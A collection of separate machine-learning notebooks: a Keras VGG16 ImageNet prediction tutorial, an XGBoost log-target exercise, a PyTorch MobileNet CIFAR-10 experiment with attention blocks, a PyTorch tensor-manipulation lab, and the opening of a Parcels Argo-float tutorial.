When the VGG model was trained in 2014, the creators subtracted the average of each of the three (R,G,B) channels first, so that the data for each channel had a mean of zero. Furthermore, their software that expected the channels to be in B,G,R order, whereas Python by default uses R,G,B. We need to preprocess our data to make these two changes, so that it is compatible with the VGG model:
```
# Mean of each channel as provided by VGG researchers
vgg_mean = np.array([123.68, 116.779, 103.939]).reshape((3,1,1))
def vgg_preprocess(x):
x = x - vgg_mean # subtract mean
return x[:, ::-1] # reverse axis bgr->rgb
```
Now we're ready to define the VGG model architecture - look at how simple it is, now that we have the basic blocks defined!
```
def VGG_16():
model = Sequential()
model.add(Lambda(vgg_preprocess, input_shape=(3,224,224)))
ConvBlock(2, model, 64)
ConvBlock(2, model, 128)
ConvBlock(3, model, 256)
ConvBlock(3, model, 512)
ConvBlock(3, model, 512)
model.add(Flatten())
FCBlock(model)
FCBlock(model)
model.add(Dense(1000, activation='softmax'))
return model
```
We'll learn about what these different blocks do later in the course. For now, it's enough to know that:
- Convolution layers are for finding patterns in images
- Dense (fully connected) layers are for combining patterns across an image
Now that we've defined the architecture, we can create the model like any python object:
```
model = VGG_16()
```
As well as the architecture, we need the weights that the VGG creators trained. The weights are the part of the model that is learnt from the data, whereas the architecture is pre-defined based on the nature of the problem.
Downloading pre-trained weights is much preferred to training the model ourselves, since otherwise we would have to download the entire Imagenet archive, and train the model for many days! It's very helpful when researchers release their weights, as they did here.
```
fpath = get_file('vgg16.h5', FILES_PATH+'vgg16.h5', cache_subdir='models')
model.load_weights(fpath)
```
## Getting imagenet predictions
The setup of the imagenet model is now complete, so all we have to do is grab a batch of images and call *predict()* on them.
```
batch_size = 4
```
Keras provides functionality to create batches of data from directories containing images; all we have to do is to define the size to resize the images to, what type of labels to create, whether to randomly shuffle the images, and how many images to include in each batch. We use this little wrapper to define some helpful defaults appropriate for imagenet data:
```
def get_batches(dirname, gen=image.ImageDataGenerator(), shuffle=True,
batch_size=batch_size, class_mode='categorical'):
return gen.flow_from_directory(path+dirname, target_size=(224,224),
class_mode=class_mode, shuffle=shuffle, batch_size=batch_size)
```
From here we can use exactly the same steps as before to look at predictions from the model.
```
batches = get_batches('train', batch_size=batch_size)
val_batches = get_batches('valid', batch_size=batch_size)
imgs,labels = next(batches)
# This shows the 'ground truth'
plots(imgs, titles=labels)
```
The VGG model returns 1,000 probabilities for each image, representing the probability that the model assigns to each possible imagenet category for each image. By finding the index with the largest probability (with *np.argmax()*) we can find the predicted label.
```
def pred_batch(imgs):
preds = model.predict(imgs)
idxs = np.argmax(preds, axis=1)
print('Shape: {}'.format(preds.shape))
print('First 5 classes: {}'.format(classes[:5]))
print('First 5 probabilities: {}\n'.format(preds[0, :5]))
print('Predictions prob/class: ')
for i in range(len(idxs)):
idx = idxs[i]
print (' {:.4f}/{}'.format(preds[i, idx], classes[idx]))
pred_batch(imgs)
```
|
github_jupyter
|
```
import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn import preprocessing
from sklearn.cross_validation import KFold
from sklearn.metrics import mean_absolute_error
%matplotlib inline
train = pd.read_csv('train.csv')
cat_feats = train.select_dtypes(include=["object"]).columns
for feat in cat_feats:
train[feat + '_id'] = preprocessing.LabelEncoder().fit_transform(train[feat].values)
num_feats = [feat for feat in train.columns if 'cont' in feat]
id_feats = [feat for feat in train.columns if '_id' in feat]
X = train[num_feats + id_feats].values
y = train['loss'].values
model = xgb.XGBRegressor(
max_depth = 12,
learning_rate = 0.2,
n_estimators = 20,
silent = 0,
objective = 'reg:linear',
nthread = -1,
# gamma = 5290.,
# min_child_weight = 4.2922,
subsample = 0.7,
colsample_bytree = 0.6,
seed = 2017
)
nfolds = 3
folds = KFold(len(y), n_folds=nfolds, shuffle = True, random_state = 2017)
for num_iter, (train_index, test_index) in enumerate(folds):
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
model.fit(X_train, y_train,
eval_metric='mae',
eval_set=[(X[train_index], y[train_index]), (X[test_index], y[test_index])],
verbose=True)
y_pred = model.predict(X_test)
y_pred[y_pred<0] = 0
score = mean_absolute_error(y_test, y_pred)
print("Fold{0}, score={1}".format(num_iter+1, score))
```
## Task
One cell above there's a model wich use y like a target variable.
Modeify the code in order to use transformed targert variable by logarithm...
some TIPS:
1. y_log_train = np.log(y_train)
2. model.fit(X_train, y_log_train, ...
3. y_log_pred = model.predict(X_test)
4. y_pred = np.exp(y_log_pred)
```
nfolds = 3
folds = KFold(len(y), n_folds=nfolds, shuffle = True, random_state = 2017)
for num_iter, (train_index, test_index) in enumerate(folds):
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
y_log_train = np.log(y_train + 1)
y_log_test = np.log(y_test + 1)
model.fit(X_train, y_log_train,
eval_metric='mae',
eval_set=[(X_train, y_log_train), (X_test, y_log_test)],
verbose=True)
y_log_pred = model.predict(X_test)
y_pred = np.exp(y_log_pred) - 1
y_pred[y_pred<0] = 0
score = mean_absolute_error(y_test, y_pred)
print("Fold{0}, score={1}".format(num_iter+1, score))
```
|
github_jupyter
|
# <center>MobileNet - Pytorch
# Step 1: Prepare data
```
# MobileNet-Pytorch
import argparse
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
from torchvision import datasets, transforms
from torch.autograd import Variable
from torch.utils.data.sampler import SubsetRandomSampler
from sklearn.metrics import accuracy_score
#from mobilenets import mobilenet
use_cuda = torch.cuda.is_available()
use_cudause_cud = torch.cuda.is_available()
dtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
# Train, Validate, Test. Heavily inspired by Kevinzakka https://github.com/kevinzakka/DenseNet/blob/master/data_loader.py
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
valid_size=0.1
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
# load the dataset
train_dataset = datasets.CIFAR10(root="data", train=True,
download=True, transform=train_transform)
valid_dataset = datasets.CIFAR10(root="data", train=True,
download=True, transform=valid_transform)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train)) #5w张图片的10%用来当做验证集
np.random.seed(42)# 42
np.random.shuffle(indices) # 随机乱序[0,1,...,49999]
train_idx, valid_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx) # 这个很有意思
valid_sampler = SubsetRandomSampler(valid_idx)
###################################################################################
# ------------------------- 使用不同的批次大小 ------------------------------------
###################################################################################
show_step=2 # 批次大,show_step就小点
max_epoch=80 # 训练最大epoch数目
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=256, sampler=train_sampler)
valid_loader = torch.utils.data.DataLoader(valid_dataset,
batch_size=256, sampler=valid_sampler)
test_transform = transforms.Compose([
transforms.ToTensor(), normalize
])
test_dataset = datasets.CIFAR10(root="data",
train=False,
download=True,transform=test_transform)
test_loader = torch.utils.data.DataLoader(test_dataset,
batch_size=256,
shuffle=True)
```
# Step 2: Model Config
# 32 缩放5次到 1x1@1024
# From https://github.com/kuangliu/pytorch-cifar
import torch
import torch.nn as nn
import torch.nn.functional as F
class Block(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block, self).__init__()
# 分组卷积数=输入通道数
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
#self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
one_conv_kernel_size = 3
self.conv1D= nn.Conv1d(1, out_planes, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1,bias=False) # 在__init__初始化
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
# -------------------------- Attention -----------------------
w = F.avg_pool2d(x,x.shape[-1]) #最好在初始化层定义好
#print(w.shape)
# [bs,in_Channel,1,1]
w = w.view(w.shape[0],1,w.shape[1])
# [bs,1,in_Channel]
# one_conv_filter = nn.Conv1d(1, out_channel, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1) # 在__init__初始化
# [bs,out_channel,in_Channel]
w = self.conv1D(w)
w = 0.5*F.tanh(w) # [-0.5,+0.5]
# -------------- softmax ---------------------------
#print(w.shape)
w = w.view(w.shape[0],w.shape[1],w.shape[2],1,1)
#print(w.shape)
# ------------------------- fusion --------------------------
out=out.view(out.shape[0],1,out.shape[1],out.shape[2],out.shape[3])
#print("x size:",out.shape)
out=out*w
#print("after fusion x size:",out.shape)
out=out.sum(dim=2)
out = F.relu(self.bn2(out))
return out
class MobileNet(nn.Module):
# (128,2) means conv planes=128, conv stride=2, by default conv stride=1
cfg = [64, (128,2), 128, (256,2), 256, (512,2), 512, 512, 512, 512, 512, (1024,2), 1024]
def __init__(self, num_classes=10):
super(MobileNet, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32) # 自动化构建层
self.linear = nn.Linear(1024, num_classes)
def _make_layers(self, in_planes):
layers = []
for x in self.cfg:
out_planes = x if isinstance(x, int) else x[0]
stride = 1 if isinstance(x, int) else x[1]
layers.append(Block(in_planes, out_planes, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.avg_pool2d(out, 2)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
```
# 32 缩放5次到 1x1@1024
# From https://github.com/kuangliu/pytorch-cifar
import torch
import torch.nn as nn
import torch.nn.functional as F
class Block_Attention_HALF(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block_Attention_HALF, self).__init__()
# 分组卷积数=输入通道数
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
#------------------------ 一半 ------------------------------
self.conv2 = nn.Conv2d(in_planes, int(out_planes*0.125), kernel_size=1, stride=1, padding=0, bias=False)
#------------------------ 另一半 ----------------------------
one_conv_kernel_size = 17 # [3,7,9]
self.conv1D= nn.Conv1d(1, int(out_planes*0.875), one_conv_kernel_size, stride=1,padding=8,groups=1,dilation=1,bias=False) # 在__init__初始化
#------------------------------------------------------------
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu6(self.bn1(self.conv1(x)))
# -------------------------- Attention -----------------------
w = F.avg_pool2d(x,x.shape[-1]) #最好在初始化层定义好
#print(w.shape)
# [bs,in_Channel,1,1]
in_channel=w.shape[1]
#w = w.view(w.shape[0],1,w.shape[1])
# [bs,1,in_Channel]
# 对这批数据取平均 且保留第0维
#w= w.mean(dim=0,keepdim=True)
# MAX=w.shape[0]
# NUM=torch.floor(MAX*torch.rand(1)).long()
# if NUM>=0 and NUM<MAX:
# w=w[NUM]
# else:
# w=w[0]
# w=w[0]
w=torch.randn(w[0].shape).cuda()*0.1
a=torch.randn(1).cuda()*0.1
if a>0.39:
print(w.shape)
print(w)
w=w.view(1,1,in_channel)
# [bs=1,1,in_Channel]
# one_conv_filter = nn.Conv1d(1, out_channel, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1) # 在__init__初始化
# [bs=1,out_channel//2,in_Channel]
w = self.conv1D(w)
# [bs=1,out_channel//2,in_Channel]
#-------------------------------------
w = 0.5*F.tanh(w) # [-0.5,+0.5]
if a>0.39:
print(w.shape)
print(w)
# [bs=1,out_channel//2,in_Channel]
w=w.view(w.shape[1],w.shape[2],1,1)
# [out_channel//2,in_Channel,1,1]
# -------------- softmax ---------------------------
#print(w.shape)
# ------------------------- fusion --------------------------
# conv 1x1
out_1=self.conv2(out)
out_2=F.conv2d(out,w,bias=None,stride=1,groups=1,dilation=1)
out=torch.cat([out_1,out_2],1)
# ----------------------- 试一试不要用relu -------------------------------
out = F.relu6(self.bn2(out))
return out
class Block_Attention(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block_Attention, self).__init__()
# 分组卷积数=输入通道数
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
#self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
one_conv_kernel_size = 17 # [3,7,9]
self.conv1D= nn.Conv1d(1, out_planes, one_conv_kernel_size, stride=1,padding=8,groups=1,dilation=1,bias=False) # 在__init__初始化
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
# -------------------------- Attention -----------------------
w = F.avg_pool2d(x,x.shape[-1]) #最好在初始化层定义好
#print(w.shape)
# [bs,in_Channel,1,1]
in_channel=w.shape[1]
#w = w.view(w.shape[0],1,w.shape[1])
# [bs,1,in_Channel]
# 对这批数据取平均 且保留第0维
#w= w.mean(dim=0,keepdim=True)
# MAX=w.shape[0]
# NUM=torch.floor(MAX*torch.rand(1)).long()
# if NUM>=0 and NUM<MAX:
# w=w[NUM]
# else:
# w=w[0]
w=w[0]
w=w.view(1,1,in_channel)
# [bs=1,1,in_Channel]
# one_conv_filter = nn.Conv1d(1, out_channel, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1) # 在__init__初始化
# [bs=1,out_channel,in_Channel]
w = self.conv1D(w)
# [bs=1,out_channel,in_Channel]
w = 0.5*F.tanh(w) # [-0.5,+0.5]
# [bs=1,out_channel,in_Channel]
w=w.view(w.shape[1],w.shape[2],1,1)
# [out_channel,in_Channel,1,1]
# -------------- softmax ---------------------------
#print(w.shape)
# ------------------------- fusion --------------------------
# conv 1x1
out=F.conv2d(out,w,bias=None,stride=1,groups=1,dilation=1)
out = F.relu(self.bn2(out))
return out
class Block(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block, self).__init__()
# 分组卷积数=输入通道数
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
return out
class MobileNet(nn.Module):
# (128,2) means conv planes=128, conv stride=2, by default conv stride=1
#cfg = [64, (128,2), 128, (256,2), 256, (512,2), 512, 512, 512, 512, 512, (1024,2), 1024]
#cfg = [64, (128,2), 128, (256,2), 256, (512,2), 512, 512, 512, 512, 512, (1024,2), [1024,1]]
cfg = [64, (128,2), 128, 256, 256, (512,2), [512,1], [512,1], [512,1],[512,1], [512,1], [1024,1], [1024,1]]
def __init__(self, num_classes=10):
super(MobileNet, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32) # 自动化构建层
self.linear = nn.Linear(1024, num_classes)
def _make_layers(self, in_planes):
layers = []
for x in self.cfg:
if isinstance(x, int):
out_planes = x
stride = 1
layers.append(Block(in_planes, out_planes, stride))
elif isinstance(x, tuple):
out_planes = x[0]
stride = x[1]
layers.append(Block(in_planes, out_planes, stride))
# AC层通过list存放设置参数
elif isinstance(x, list):
out_planes= x[0]
stride = x[1] if len(x)==2 else 1
layers.append(Block_Attention_HALF(in_planes, out_planes, stride))
else:
pass
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# From https://github.com/Z0m6ie/CIFAR-10_PyTorch
#model = mobilenet(num_classes=10, large_img=False)
# From https://github.com/kuangliu/pytorch-cifar
if torch.cuda.is_available():
model=MobileNet(10).cuda()
else:
model=MobileNet(10)
optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)
#scheduler = StepLR(optimizer, step_size=70, gamma=0.1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[50,70,75,80], gamma=0.1)
criterion = nn.CrossEntropyLoss()
# Implement validation
def train(epoch):
model.train()
#writer = SummaryWriter()
for batch_idx, (data, target) in enumerate(train_loader):
if use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
correct = 0
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).sum()
loss = criterion(output, target)
loss.backward()
accuracy = 100. * (correct.cpu().numpy()/ len(output))
optimizer.step()
if batch_idx % 5*show_step == 0:
# if batch_idx % 2*show_step == 0:
# print(model.layers[1].conv1D.weight.shape)
# print(model.layers[1].conv1D.weight[0:2][0:2])
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}, Accuracy: {:.2f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item(), accuracy))
# f1=open("Cifar10_INFO.txt","a+")
# f1.write("\n"+'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}, Accuracy: {:.2f}'.format(
# epoch, batch_idx * len(data), len(train_loader.dataset),
# 100. * batch_idx / len(train_loader), loss.item(), accuracy))
# f1.close()
#writer.add_scalar('Loss/Loss', loss.item(), epoch)
#writer.add_scalar('Accuracy/Accuracy', accuracy, epoch)
scheduler.step()
def validate(epoch):
model.eval()
#writer = SummaryWriter()
valid_loss = 0
correct = 0
for data, target in valid_loader:
if use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
valid_loss += F.cross_entropy(output, target, size_average=False).item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).sum()
valid_loss /= len(valid_idx)
accuracy = 100. * correct.cpu().numpy() / len(valid_idx)
print('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
valid_loss, correct, len(valid_idx),
100. * correct / len(valid_idx)))
# f1=open("Cifar10_INFO.txt","a+")
# f1.write('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
# valid_loss, correct, len(valid_idx),
# 100. * correct / len(valid_idx)))
# f1.close()
#writer.add_scalar('Loss/Validation_Loss', valid_loss, epoch)
#writer.add_scalar('Accuracy/Validation_Accuracy', accuracy, epoch)
return valid_loss, accuracy
# Fix best model
def test(epoch):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
if use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
test_loss += F.cross_entropy(output, target, size_average=False).item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct.cpu().numpy() / len(test_loader.dataset)))
# f1=open("Cifar10_INFO.txt","a+")
# f1.write('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
# test_loss, correct, len(test_loader.dataset),
# 100. * correct.cpu().numpy() / len(test_loader.dataset)))
# f1.close()
def save_best(loss, accuracy, best_loss, best_acc):
if best_loss == None:
best_loss = loss
best_acc = accuracy
file = 'saved_models/best_save_model.p'
torch.save(model.state_dict(), file)
elif loss < best_loss and accuracy > best_acc:
best_loss = loss
best_acc = accuracy
file = 'saved_models/best_save_model.p'
torch.save(model.state_dict(), file)
return best_loss, best_acc
# Fantastic logger for tensorboard and pytorch,
# run tensorboard by opening a new terminal and run "tensorboard --logdir runs"
# open tensorboard at http://localhost:6006/
from tensorboardX import SummaryWriter
best_loss = None
best_acc = None
import time
SINCE=time.time()
for epoch in range(max_epoch):
train(epoch)
loss, accuracy = validate(epoch)
best_loss, best_acc = save_best(loss, accuracy, best_loss, best_acc)
NOW=time.time()
DURINGS=NOW-SINCE
SINCE=NOW
print("the time of this epoch:[{} s]".format(DURINGS))
if epoch>=10 and (epoch-10)%2==0:
test(epoch)
# writer = SummaryWriter()
# writer.export_scalars_to_json("./all_scalars.json")
# writer.close()
#---------------------------- Test ------------------------------
test(epoch)
```
# Step 3: Test
```
test(epoch)
```
## 第一次 scale 位于[0,1]

```
# 查看训练过程的信息
import matplotlib.pyplot as plt
def parse(in_file,flag):
num=-1
ys=list()
xs=list()
losses=list()
with open(in_file,"r") as reader:
for aLine in reader:
#print(aLine)
res=[e for e in aLine.strip('\n').split(" ")]
if res[0]=="Train" and flag=="Train":
num=num+1
ys.append(float(res[-1]))
xs.append(int(num))
losses.append(float(res[-3].split(',')[0]))
if res[0]=="Validation" and flag=="Validation":
num=num+1
xs.append(int(num))
tmp=[float(e) for e in res[-2].split('/')]
ys.append(100*float(tmp[0]/tmp[1]))
losses.append(float(res[-4].split(',')[0]))
plt.figure(1)
plt.plot(xs,ys,'ro')
plt.figure(2)
plt.plot(xs, losses, 'ro')
plt.show()
def main():
in_file="D://INFO.txt"
# 显示训练阶段的正确率和Loss信息
parse(in_file,"Train") # "Validation"
# 显示验证阶段的正确率和Loss信息
#parse(in_file,"Validation") # "Validation"
if __name__=="__main__":
main()
# 查看训练过程的信息
import matplotlib.pyplot as plt
def parse(in_file,flag):
num=-1
ys=list()
xs=list()
losses=list()
with open(in_file,"r") as reader:
for aLine in reader:
#print(aLine)
res=[e for e in aLine.strip('\n').split(" ")]
if res[0]=="Train" and flag=="Train":
num=num+1
ys.append(float(res[-1]))
xs.append(int(num))
losses.append(float(res[-3].split(',')[0]))
if res[0]=="Validation" and flag=="Validation":
num=num+1
xs.append(int(num))
tmp=[float(e) for e in res[-2].split('/')]
ys.append(100*float(tmp[0]/tmp[1]))
losses.append(float(res[-4].split(',')[0]))
plt.figure(1)
plt.plot(xs,ys,'r-')
plt.figure(2)
plt.plot(xs, losses, 'r-')
plt.show()
def main():
in_file="D://INFO.txt"
# 显示训练阶段的正确率和Loss信息
parse(in_file,"Train") # "Validation"
# 显示验证阶段的正确率和Loss信息
parse(in_file,"Validation") # "Validation"
if __name__=="__main__":
main()
```
|
github_jupyter
|
# Lab 1: Tensor Manipulation
First Author: Seungjae Ryan Lee (seungjaeryanlee at gmail dot com)
Second Author: Ki Hyun Kim (nlp.with.deep.learning at gmail dot com)
<div class="alert alert-warning">
NOTE: This corresponds to <a href="https://www.youtube.com/watch?v=ZYX0FaqUeN4&t=23s&list=PLlMkM4tgfjnLSOjrEJN31gZATbcj_MpUm&index=25">Lab 8 of Deep Learning Zero to All Season 1 for TensorFlow</a>.
</div>
## Imports
Run `pip install -r requirements.txt` in terminal to install all required Python packages.
```
import numpy as np
import torch
```
## NumPy Review
We hope that you are familiar with `numpy` and basic linear algebra.
### 1D Array with NumPy
```
t = np.array([0., 1., 2., 3., 4., 5., 6.])
print(t)
print('Rank of t: ', t.ndim)
print('Shape of t: ', t.shape)
print('t[0] t[1] t[-1] = ', t[0], t[1], t[-1]) # Element
print('t[2:5] t[4:-1] = ', t[2:5], t[4:-1]) # Slicing
print('t[:2] t[3:] = ', t[:2], t[3:]) # Slicing
```
### 2D Array with NumPy
```
t = np.array([[1., 2., 3.], [4., 5., 6.], [7., 8., 9.], [10., 11., 12.]])
print(t)
print('Rank of t: ', t.ndim)
print('Shape of t: ', t.shape)
```
## PyTorch is like NumPy (but better)
### 1D Array with PyTorch
```
t = torch.FloatTensor([0., 1., 2., 3., 4., 5., 6.])
print(t)
print(t.dim()) # rank
print(t.shape) # shape
print(t.size()) # shape
print(t[0], t[1], t[-1]) # Element
print(t[2:5], t[4:-1]) # Slicing
print(t[:2], t[3:]) # Slicing
```
### 2D Array with PyTorch
```
t = torch.FloatTensor([[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.],
[10., 11., 12.]
])
print(t)
print(t.dim()) # rank
print(t.size()) # shape
print(t[:, 1])
print(t[:, 1].size())
print(t[:, :-1])
```
### Shape, Rank, Axis
```
t = torch.FloatTensor([[[[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[17, 18, 19, 20],
[21, 22, 23, 24]]
]])
print(t.dim()) # rank = 4
print(t.size()) # shape = (1, 2, 3, 4)
```
## Frequently Used Operations in PyTorch
### Mul vs. Matmul
```
print()
print('-------------')
print('Mul vs Matmul')
print('-------------')
m1 = torch.FloatTensor([[1, 2], [3, 4]])
m2 = torch.FloatTensor([[1], [2]])
print('Shape of Matrix 1: ', m1.shape) # 2 x 2
print('Shape of Matrix 2: ', m2.shape) # 2 x 1
print(m1.matmul(m2)) # 2 x 1
m1 = torch.FloatTensor([[1, 2], [3, 4]])
m2 = torch.FloatTensor([[1], [2]])
print('Shape of Matrix 1: ', m1.shape) # 2 x 2
print('Shape of Matrix 2: ', m2.shape) # 2 x 1
print(m1 * m2) # 2 x 2
print(m1.mul(m2))
```
### Broadcasting
<div class="alert alert-warning">
Carelessly using broadcasting can lead to code hard to debug.
</div>
```
# Same shape
m1 = torch.FloatTensor([[3, 3]])
m2 = torch.FloatTensor([[2, 2]])
print(m1 + m2)
# Vector + scalar
m1 = torch.FloatTensor([[1, 2]])
m2 = torch.FloatTensor([3]) # 3 -> [[3, 3]]
print(m1 + m2)
# 2 x 1 Vector + 1 x 2 Vector
m1 = torch.FloatTensor([[1, 2]])
m2 = torch.FloatTensor([[3], [4]])
print(m1 + m2)
```
### Mean
```
t = torch.FloatTensor([1, 2])
print(t.mean())
# Can't use mean() on integers
t = torch.LongTensor([1, 2])
try:
print(t.mean())
except Exception as exc:
print(exc)
```
You can also use `t.mean` for higher rank tensors to get mean of all elements, or mean by particular dimension.
```
t = torch.FloatTensor([[1, 2], [3, 4]])
print(t)
print(t.mean())
print(t.mean(dim=0))
print(t.mean(dim=1))
print(t.mean(dim=-1))
```
### Sum
```
t = torch.FloatTensor([[1, 2], [3, 4]])
print(t)
print(t.sum())
print(t.sum(dim=0))
print(t.sum(dim=1))
print(t.sum(dim=-1))
```
### Max and Argmax
```
t = torch.FloatTensor([[1, 2], [3, 4]])
print(t)
```
The `max` operator returns one value if it is called without an argument.
```
print(t.max()) # Returns one value: max
```
The `max` operator returns 2 values when called with dimension specified. The first value is the maximum value, and the second value is the argmax: the index of the element with maximum value.
```
print(t.max(dim=0)) # Returns two values: max and argmax
print('Max: ', t.max(dim=0)[0])
print('Argmax: ', t.max(dim=0)[1])
print(t.max(dim=1))
print(t.max(dim=-1))
```
### View
<div class="alert alert-warning">
This is a function hard to master, but is very useful!
</div>
```
t = np.array([[[0, 1, 2],
[3, 4, 5]],
[[6, 7, 8],
[9, 10, 11]]])
ft = torch.FloatTensor(t)
print(ft.shape)
print(ft.view([-1, 3]))
print(ft.view([-1, 3]).shape)
print(ft.view([-1, 1, 3]))
print(ft.view([-1, 1, 3]).shape)
```
### Squeeze
```
ft = torch.FloatTensor([[0], [1], [2]])
print(ft)
print(ft.shape)
print(ft.squeeze())
print(ft.squeeze().shape)
```
### Unsqueeze
```
ft = torch.Tensor([0, 1, 2])
print(ft.shape)
print(ft.unsqueeze(0))
print(ft.unsqueeze(0).shape)
print(ft.view(1, -1))
print(ft.view(1, -1).shape)
print(ft.unsqueeze(1))
print(ft.unsqueeze(1).shape)
print(ft.unsqueeze(-1))
print(ft.unsqueeze(-1).shape)
```
### Scatter (for one-hot encoding)
<div class="alert alert-warning">
Scatter is a very flexible function. We only discuss how to use it to get a one-hot encoding of indices.
</div>
```
lt = torch.LongTensor([[0], [1], [2], [0]])
print(lt)
one_hot = torch.zeros(4, 3) # batch_size = 4, classes = 3
one_hot.scatter_(1, lt, 1)
print(one_hot)
```
### Casting
```
lt = torch.LongTensor([1, 2, 3, 4])
print(lt)
print(lt.float())
bt = torch.ByteTensor([True, False, False, True])
print(bt)
print(bt.long())
print(bt.float())
```
### Concatenation
```
x = torch.FloatTensor([[1, 2], [3, 4]])
y = torch.FloatTensor([[5, 6], [7, 8]])
print(torch.cat([x, y], dim=0))
print(torch.cat([x, y], dim=1))
```
### Stacking
```
x = torch.FloatTensor([1, 4])
y = torch.FloatTensor([2, 5])
z = torch.FloatTensor([3, 6])
print(torch.stack([x, y, z]))
print(torch.stack([x, y, z], dim=1))
print(torch.cat([x.unsqueeze(0), y.unsqueeze(0), z.unsqueeze(0)], dim=0))
```
### Ones and Zeros Like
```
x = torch.FloatTensor([[0, 1, 2], [2, 1, 0]])
print(x)
print(torch.ones_like(x))
print(torch.zeros_like(x))
```
### In-place Operation
```
x = torch.FloatTensor([[1, 2], [3, 4]])
print(x.mul(2.))
print(x)
print(x.mul_(2.))
print(x)
```
## Miscellaneous
### Zip
```
for x, y in zip([1, 2, 3], [4, 5, 6]):
print(x, y)
for x, y, z in zip([1, 2, 3], [4, 5, 6], [7, 8, 9]):
print(x, y, z)
```
|
github_jupyter
|
## Tutorial on how to simulate an Argo float in Parcels
This tutorial shows how simple it is to construct a Kernel in Parcels that mimics the [vertical movement of Argo floats](http://www.argo.ucsd.edu/operation_park_profile.jpg).
```
